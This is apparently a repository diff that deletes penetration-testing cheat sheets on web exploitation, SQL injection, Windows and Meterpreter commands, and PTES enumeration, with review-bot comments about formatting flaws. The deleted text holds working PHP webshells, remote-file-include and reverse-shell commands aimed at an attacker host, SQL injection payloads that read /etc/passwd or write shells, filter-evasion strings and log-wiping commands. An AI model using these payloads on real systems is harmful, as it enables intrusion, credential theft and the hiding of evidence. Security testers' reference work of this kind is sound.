Capture all Port 80 Traffic to a File
tcpdump -s 1514 port 80 -w capture_file
host // look for traffic based on IP address (also works with hostname if you’re not using -n)
tcpdump host 1.2.3.4
src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)
tcpdump src 2.3.4.5
tcpdump dst 3.4.5.6
net // capture an entire network using CIDR notation
tcpdump net 1.2.3.0/24
proto // works for tcp, udp, and icmp
tcpdump icmp
port // see only traffic to or from a certain port
tcpdump port 3389
src, dst port // filter based on the source or destination port
tcpdump src port 1025 # tcpdump dst port 389
src/dst, port, protocol // combine all three
tcpdump src port 1025 and tcp
tcpdump udp and src port 53
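Review bot: this hunk removes the tcpdump reference links and sample filters outright with no replacement visible in the hunk; if they are being relocated (as the Radare2.txt → Radare2.md rename above does for that file), the new location should appear in the same changeset. When carrying them over, split `tcpdump src port 1025 # tcpdump dst port 389` into two lines, since `#` starts a shell comment and the second filter would never run.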

+ 0
- 3
Draft/Cheat sheets reference pages Checklists -/ToDO.txt View File

@ -1,3 +0,0 @@
Tools that need cmd refs:

+ 0
- 98
Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt View File

@ -1,98 +0,0 @@
Web Application exploitation - a cheatsheet By Tim Arneaud
If you want to get the full article, please go to the Source.
WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>
<?php system($_GET['cmd']) ?>
or
<?php system($_REQUEST['cmd']); ?>
Example usage via Remote File Include (RFI):
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp
------
attacker msfconsole:
use multi/exploit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker-ip>
set LPORT <attacker-multi-handler-port>
exploit
Specific Web applications
Joomla
Joomla default database configuration filename
<web-app-path>/configuration.php
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>
/pentest/enumeration/web/cms-explorer -url <target-and-joomla-path> -type joomla
WordPress
WordPress default database configuration filename
<web-app-path>
WordPress default login page
<web-app-path> /wp-login.php
WordPress plugins
<web-app-path> /wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t]
/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php
<?php system($_GET['cmd']) ?>
zip -r wpx.zip wpx
upload wpx.zip via web interface as an installed theme
Command execution access is via:
<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)>
Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)
Cacti
Cacti default database configuration filename
<web-app-path> /include/config.php
DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
<web-app-path> /inc/mysql.php
Drupal
Drupal default database configuration filename
<web-app-path> /sites/default/settings.php
Scanning WordPress for plugins and versions
/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal
Timeclock
Timeclock default database configuration filename
<web-app-path>/db.php
SQL Terminators/Comments
MSSQL and MySQL:
<sql injected command>;--
MySQL:
<sql injected command>;#
Login Pages Basic SQL injection
MS IIS
' OR '1=1';--
MySQL
'OR 1=1--
SQLMap commands
cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba
Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html
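Review bot: several extraction defects in the deleted text should not be carried over if it is relocated: `<target-and-wordpress-path&gt;` on the wpscan line is an escaped `>` left from HTML; `WordPress default database configuration filename` is followed by a bare `<web-app-path>` with no filename; and the `Scanning WordPress for plugins and versions` heading in the Drupal section is a copy-paste from the WordPress section (the command beneath it is the Drupal one). The source attribution on the last line should stay with the content wherever it lands.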

+ 0
- 35
Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt View File

@ -1,35 +0,0 @@
##Windows Commands Reference
Netview.exe
Date /t
Systeminfo
Tasklist /svc services
It also impements various useful metafunctions, including a port of Rob Fuller's netview.exe tool, and some custom-written 'UserHunter' functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. See function descriptions for appropriate usage and available options.
###Active Directory
Groups/Users in domain
net users /domain
net group /domain
net group “Domain Admins” /domain
Computers in a domain
Find user fileservers
Net use - look for mapped drives
Net user <username> /domain - extract home directory server
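Review bot: the paragraph beginning `It also impements various useful metafunctions` describes a tool (the netview.exe port, the UserHunter functions) without ever naming it, so it reads as orphaned text; `impements` is misspelled, `net group “Domain Admins” /domain` uses curly quotes that cmd.exe will not treat as quoting, and `Computers in a domain` has no command under it. Fix these if the list is moved rather than dropped.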

+ 0
- 0
Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf View File


Draft/list_of_emoji.md → Draft/Cheat sheets reference pages Checklists -/list_of_emoji.md View File


Draft/metasploit.md → Draft/Cheat sheets reference pages Checklists -/metasploit.md View File


+ 0
- 111
Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt View File

@ -1,111 +0,0 @@
CheatSheet: SQL Injection
Comments
/* – Multi line comment.
# – single line comment.
-- – single line comment.
/*!*/ – Mysql special comments.
Whitespaces.
+, %2B, %20, %09, %0d ,%0?, /**/, /*foo*/
Global system variables
@@datadir // Mysql data directory.
@@version_compile_os - //OS Mysql is running on.
@@version – //Mysql database version.
user() – //Current database user.
@@log_error – //Path to error log.
database() – //Current database.
The INFORMATION_SCHEMA database is made up of the following objects:
SCHEMATA
TABLES
COLUMNS
STATISTICS
USER_PRIVILEGES
SCHEMA_PRIVILEGES
TABLE_PRIVILEGES
COLUMN_PRIVILEGES
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
TABLE_CONSTRAINTS
KEY_COLUMN_USAGE
ROUTINES
VIEWS
TRIGGERS
PROFILING
Columns in a SELECT.
file.php?var=1 order by 10-- //Unknown column ’10' in ‘order clause’
file.php?var=1 and(select * from table)=(1)-- //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as latin1)-- //5.0.11
file.php?var=1 union select convert(version() as binary)-- //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
file.php?var=1 union select unhex(hex(versions()))-- //5.0.11
File_priv.
file.php?var=1 union select user()-- //Checking current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user=’root’-- //Checking for the file priveledge on current user, Y =Yes N=No.
file.php?var=1 union select load_file(‘/etc/passwd’)-- // Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)-- // Loading system files with error based injection.
file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’-- // Write code to a file.
file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”--+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*select*/ version()-- //MySQL comments.
file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass
file.php?var=1/**/union/**/select/**/version()-- //Whitespace bypass
file.php?var=1 UnION SElecT version()-- //Mixed upper/lower
file.php?var=1 uni/**/on sel/**/ect version()-- //php comments.
file.php?var=1 uni%6Fn select version()-- //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- //Taking advantage of a WAF that only decodes input once.
file.php?var=1 0×414141414141414141414141414141414141 union select version()-- //Buffer overflow.
file.php?var=1 union select 0x3a3a3a-- //Encode to bypass magic quotes.
Extracting data from MySQL errors.
Rand()
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --
Name_const(Mysql 5.0.12 > 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--
Extractvalue & updatexml (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))-- //Xpath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()))-- //Xpath error
Misc.
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits Blackfan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--
Injecting into an order byfile.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW())))-- //time based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3))-- //Time based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM in
formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))--
If Statement SQL Injection Attack Samples
SELECT IF(user()='root@localhost','true','false')
Load File
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
Create User
CREATE USER username IDENTIFIED BY 'password'; --
Drop User
DROP USER username; --
Make user to DBA
GRANT ALL PRIVILEGES ON *.* TO username@'%';
List Users
SELECT * FROM 'user' WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user
Getting user defined tables SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
Getting Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’tblUsers -> tablename
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
find table which have a column called 'username'
String without Quotes
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
This will return ‘KLM’.
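Review bot: much of the deleted text is not copy-pasteable as written and should be cleaned wherever it lands: curly quotes (`’root’`, `‘/etc/passwd’`, `“<?php`) replace ASCII quotes from the `File_priv` section onward, the `FIND_IN_SET` blind example is wrapped across four lines, and `SELECT * FROM 'user'` single-quotes a table name where the next line correctly uses `mysql.user`. Also `table_schema = 'tblUsers'` is annotated `tblUsers -> tablename` although the column being filtered is the schema, not the table.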

+ 0
- 69
Draft/Counter_Surveillance.md View File

@ -1,69 +0,0 @@
# Counter Surveillance
I am not a professional and may be a twelve year old child. Be wary.
#### Table of Contents
* Cull
* [Guides/Write-ups](#guides)
* [Videos/Presentations](#videos)
* [Papers](#papers)
### <a name="guides">Guides/Write-ups</a>
* Writeups
* Detecting Surveillance - Spiderlabs blog
* [1 Hardware Implants](http://blog.spiderlabs.com/2014/03/detecting-surveillance-state-surveillance-part-1-hardware-impants.html)
* [2 Radio Frequency Exfiltration](http://blog.spiderlabs.com/2014/03/detecting-a-surveillance-state-part-2-radio-frequency-exfiltration.html)
* [3 Infected Firmware](http://blog.spiderlabs.com/2014/04/detecting-a-surveillance-state-part-3-infected-firmware.html)
* [A Simple Guide to TSCM Sweeps](http://www.international-intelligence.co.uk/tscm-sweep-guide.html)
* **Videos/Talks**
* [Fuck These Guys: Practical Countersurveillance Lisa Lorenzin - BsidesSF15](http://www.irongeek.com/i.php?page=videos/bsidessf2015/201-fck-these-guys-practical-countersurveillance-lisa-lorenzin)
* We've all seen the steady stream of revelations about the NSA's unconstitutional, illegal mass surveillance. Seems like there's a new transgression revealed every week! I'm getting outrage fatigue. So I decided to fight back... by looking for practical, realistic, everyday actions I can take to protect my privacy and civil liberties on the Internet, and sharing them with my friends. Join me in using encryption and privacy technology to resist eavesdropping and tracking, and to start to opt out of the bulk data collection that the NSA has unilaterally decided to secretly impose upon the world. Let's take back the Internet, one encrypted bit at a time.
* [Dr. Philip Polstra - Am I Being Spied On?](https://www.youtube.com/watch?v=Bc7WoDXhcjM)
* Talk on cheap/free counter measures
* [DNS May Be Hazardous to Your Health - Robert Stucke](https://www.youtube.com/watch?v=ZPbyDSvGasw)
* Great talk on attacking DNS
* [CounterStrike Lawful Interception](https://www.youtube.com/watch?v=7HXLaRWk1SM)
* This short talk will cover the standards, devices and implementation of a mandatory part of our western Internet infrastructure. The central question is whether an overarching interception functionality might actually put national Internet infrastructure at a higher risk of being attacked successfully. The question is approached in this talk from a purely technical point of view, looking at how LI functionality is implemented by a major vendor and what issues arise from that implementation. Routers and other devices may get hurt in the process.
* [Slides](http://phenoelit.org/stuff/CSLI.pdf)
-----
### <a name="papers">Papers</a>
* [Exploiting Lawful Intercept to Wiretap the Internet](https://www.blackhat.com/presentations/bh-dc-10/Cross_Tom/BlackHat-DC-2010-Cross-Attacking-LawfulI-Intercept-wp.pdf)
* This paper will review Cisco's architecture for lawful intercept from asecurity perspective. We explain how a number of different weaknesses in its design coupled with publicly disclosed security vulnerabilities could enable a malicious person to access the interface and spy on communications without leaving a trace. We then provide a set of recommendations for the redesign of the interface as well as SNMP authentication in general to better mitigate the security risks.
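Review bot: the Table of Contents links to `#videos`, but the only anchors in the file are `guides` and `papers` (the Videos/Talks heading is a bold bullet with no `<a name>`), and it carries a stray `* Cull` entry with no link; `from asecurity perspective` in the Papers summary is missing a space. If the file is being moved rather than dropped, carry those fixes over.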

+ 0
- 19
Draft/Frameworks Methodologies/Metasploit Reference.txt View File

@ -1,19 +0,0 @@
Metasploit Reference
Meterpreter CMD Reference:
ps - (show running processes and their associated users/id numbers)
getuid - Get user ID
getpid - Gets the process ID
getprivs - (shows current privileges)
getsystem - Attempts to get SYSTEM using 4 methods, the last being a local exploit called Kitrap0d. This can sometimes be caught by host based IDS systems and even in rare occasions blue screen the machine.
sysinfo - Get system information
timestomp - Remove/screw up timestamps if you are good enough this messes up audit tools
clearev - Clears event logs
hashdump - dump SAM file hashes for pass the hash or cracking
migrate [pid] - Move from exploited process into another process
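Review bot: if these Meterpreter command descriptions are meant to live in the renamed metasploit.md above rather than be dropped, that merge should be visible in this changeset. When carried over, `timestomp - Remove/screw up timestamps if you are good enough this messes up audit tools` needs punctuation to read correctly, and the parenthesised descriptions on `ps` and `getprivs` are inconsistent with the bare descriptions on the other entries.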

+ 0
- 110
Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt View File

@ -1,110 +0,0 @@
Discovery & Probing
Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
Default Port Lists
Windows
*nix
Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
General Enumeration Tools
nmap
nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
nmap -A -sS -PN -n --script:all ip_address --reason
grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
netcat
nc -v -n IP_Address port
nc -v -w 2 -z IP_Address port_range/port_number
amap
amap -bqv 192.168.1.1 80
amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
xprobe2
xprobe2 192.168.1.1
sinfp
./sinfp.pl -i -p
nbtscan
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
Hping
hping ip_address
Scanrand
scanrand ip_address:all
unicornscan
unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
Netenum
netenum network/netmask timeout
fping
fping -a -d hostname/ (Network/Subnet_Mask)
Firewall Specific Tools
firewalk
firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
ftester
host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
Active Hosts
Open TCP Ports
Closed TCP Ports
Open UDP Ports
Closed UDP Ports
Service Probing
SMTP Mail Bouncing
Banner Grabbing
Other
HTTP
Commands
JUNK / HTTP/1.0
HEAD / HTTP/9.3
OPTIONS / HTTP/1.0
HEAD / HTTP/1.0
Extensions
WebDAV
ASP.NET
Frontpage
OWA
IIS ISAPI
PHP
OpenSSL
HTTPS
Use stunnel to encapsulate traffic.
SMTP
POP3
FTP
If banner altered, attempt anon logon and execute: 'quote help' and 'syst' commands.
ICMP Responses
Type 3 (Port Unreachable)
Type 8 (Echo Request)
Type 13 (Timestamp Request)
Type 15 (Information Request)
Type 17 (Subnet Address Mask Request)
Responses from broadcast address
Source Port Scans
TCP/UDP 53 (DNS)
TCP 20 (FTP Data)
TCP 80 (HTTP)
TCP/UDP 88 (Kerberos)
Firewall Assessment
Firewalk
TCP/UDP/ICMP responses
OS Fingerprint
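Review bot: `-T Agressive` in the first nmap line is misspelled; nmap takes the timing template by name (`-T aggressive`, matching the `-T polite` form used two lines below) or by number, and rejects the misspelled form. The opening paragraph is also a single unbroken block of text, and the entries from `Active Hosts` through `OS Fingerprint` are empty outline headings; if this checklist is relocated, reflow the paragraph and either fill or drop the empty headings.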

+ 0
- 832
Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt View File

@ -1,832 +0,0 @@
Enumeration
FTP port 21 open
Fingerprint server
telnet ip_address 21 (Banner grab)
Run command ftp ip_address
ftp@example.com
Check for anonymous access
ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
Password guessing
Hydra brute force
medusa
Brutus
Examine configuration files
ftpusers
ftp.conf
proftpd.conf
MiTM
pasvagg.pl
SSH port 22 open
Fingerprint server
telnet ip_address 22 (banner grab)
scanssh
scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
Password guessing
ssh root@ip_address
guess-who
./b -l username -h ip_address -p 22 -2 < password_file_location
Hydra brute force
brutessh
Ruby SSH Bruteforcer
Examine configuration files
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts
SSH Client programs
tunnelier
winsshd
putty
winscp
Telnet port 23 open
Fingerprint server
telnet ip_address
Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
telnetfp
Password Attack
Common passwords
Hydra brute force
Brutus
telnet -l "-froot" hostname (Solaris 10+)
Examine configuration files
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
Sendmail Port 25 open
Fingerprint server
telnet ip_address 25 (banner grab)
Mail Server Testing
Enumerate users
VRFY username (verifies if username exists - enumeration of accounts)
EXPN username (verifies if username is valid - enumeration of accounts)
Mail Spoof Test
HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
Mail Relay Test
HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
Unknown domain - mail from: <user@unknown_domain>
Domain not present - mail from: <user@localhost>
Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
Examine Configuration Files
sendmail.cf
submit.cf
DNS port 53 open
Fingerprint server/ service
host
host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
nslookup
nslookup [ -option ... ] [ host-to-find | - [ server ]]
dig
dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
DNS Enumeration
Bile Suite
perl BiLE.pl [website] [project_name]
perl BiLE-weigh.pl [website] [input file]
perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
perl vet-mx.pl [input file] [true domain file] [output file]
perl exp-tld.pl [input file] [output file]
perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
perl qtrace.pl [ip_address_file] [output_file]
perl jarf-rev [subnetblock] [nameserver]
txdns
txdns -rt -t domain_name
txdns -x 50 -bb domain_name
txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
Examine Configuration Files
host.conf
resolv.conf
named.conf
TFTP port 69 open
TFTP Enumeration
tftp ip_address PUT local_file
tftp ip_address GET conf.txt (or other files)
Solarwinds TFTP server
tftp – i <IP> GET /etc/passwd (old Solaris)
TFTP Bruteforcing
TFTP bruteforcer
Cisco-Torch
Finger Port 79 open
User enumeration
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com
Command execution
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
finger user@host@victim
finger @internal@external
Web Ports 80, 8080 etc. open
Fingerprint server
Telnet ip_address port
Firefox plugins
All
firecat
Specific
add n edit cookies
asnumber
header spy
live http headers
shazou
web developer
Crawl website
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
httprint
Metagoofil
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
Nikto
nikto [-h target] [options]
DirBuster
Wikto
Goolag Scanner
Vulnerability Assessment
Manual Tests
Default Passwords
Install Backdoors
ASP
http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
Assorted
http://michaeldaw.org/projects/web-backdoor-compilation/
http://open-labs.org/hacker_webkit02.tar.gz
Perl
http://home.arcor.de/mschierlm/test/pmsh.pl
http://pentestmonkey.net/tools/perl-reverse-shell/
http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
PHP
http://php.spb.ru/remview/
http://pentestmonkey.net/tools/php-reverse-shell/
http://pentestmonkey.net/tools/php-findsock-shell/
Python
http://matahari.sourceforge.net/
TCL
http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
Bash Connect Back Shell
GnuCitizen
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
Method Testing
nc IP_Adress Port
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x
Upload Files
curl
curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
put.pl
put.pl -h target -r /remote_file_name -f local_file_name
webdav
cadaver
View Page Source
Hidden Values
Developer Remarks
Extraneous Code
Passwords!
Input Validation Checks
NULL or null
Possible error messages returned.
' , " , ; , <!
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
– , = , + , "
Used to craft SQL Injection queries.
‘ , &, ! , ¦ , < , >
Used to find command execution vulnerabilities.
"><script>alert(1)</script>
Basic Cross-Site Scripting Checks.
%0d%0a
Carriage Return (%0d) Line Feed (%0a)
HTTP Splitting
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
%7f , %ff
byte-length overflows; maximum 7- and 8-bit values.
-1, other
Integer and underflow vulnerabilities.
%n , %x , %s
Testing for format string vulnerabilities.
../
Directory Traversal Vulnerabilities.
% , _, *
Wildcard characters can sometimes present DoS issues or information disclosure.
Ax1024+
Overflow vulnerabilities.
Automated table and column iteration
orderby.py
./orderby.py www.site.com/index.php?id=
d3sqlfuzz.py
./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
Vulnerability Scanners
Acunetix
Grendelscan
NStealth
Obiwan III
w3af
Specific Applications/ Server Tools
Domino
dominoaudit
dominoaudit.pl [options] -h <IP>
Joomla
cms_few
./cms.py <site-name>
joomsq
./joomsq.py <IP>
joomlascan
./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
joomscan
./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
jscan
jscan.pl -f hostname
(shell.txt required)
aspaudit.pl
asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
Vbulletin
vbscan.py
vbscan.py <host> <port> -v
vbscan.py -update
ZyXel
zyxel-bf.sh
snmpwalk
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
snmpget
snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
Proxy Testing
Burpsuite
Crowbar
Interceptor
Paros
Requester Raw
Suru
WebScarab
Examine configuration files
Generic
Examine httpd.conf/ windows config files
JBoss
JMX Console http://<IP>:8080/jmxconcole/
War File
Joomla
configuration.php
diagnostics.php
joomla.inc.php
config.inc.php
Mambo
configuration.php
config.inc.php
Wordpress
setup-config.php
wp-config.php
ZyXel
/WAN.html (contains PPPoE ISP password)
/WLAN_General.html and /WLAN.html (contains WEP key)
/rpDyDNS.html (contains DDNS credentials)
/Firewall_DefPolicy.html (Firewall)
/CF_Keyword.html (Content Filter)
/RemMagWWW.html (Remote MGMT)
/rpSysAdmin.html (System)
/LAN_IP.html (LAN)
/NAT_General.html (NAT)
/ViewLog.html (Logs)
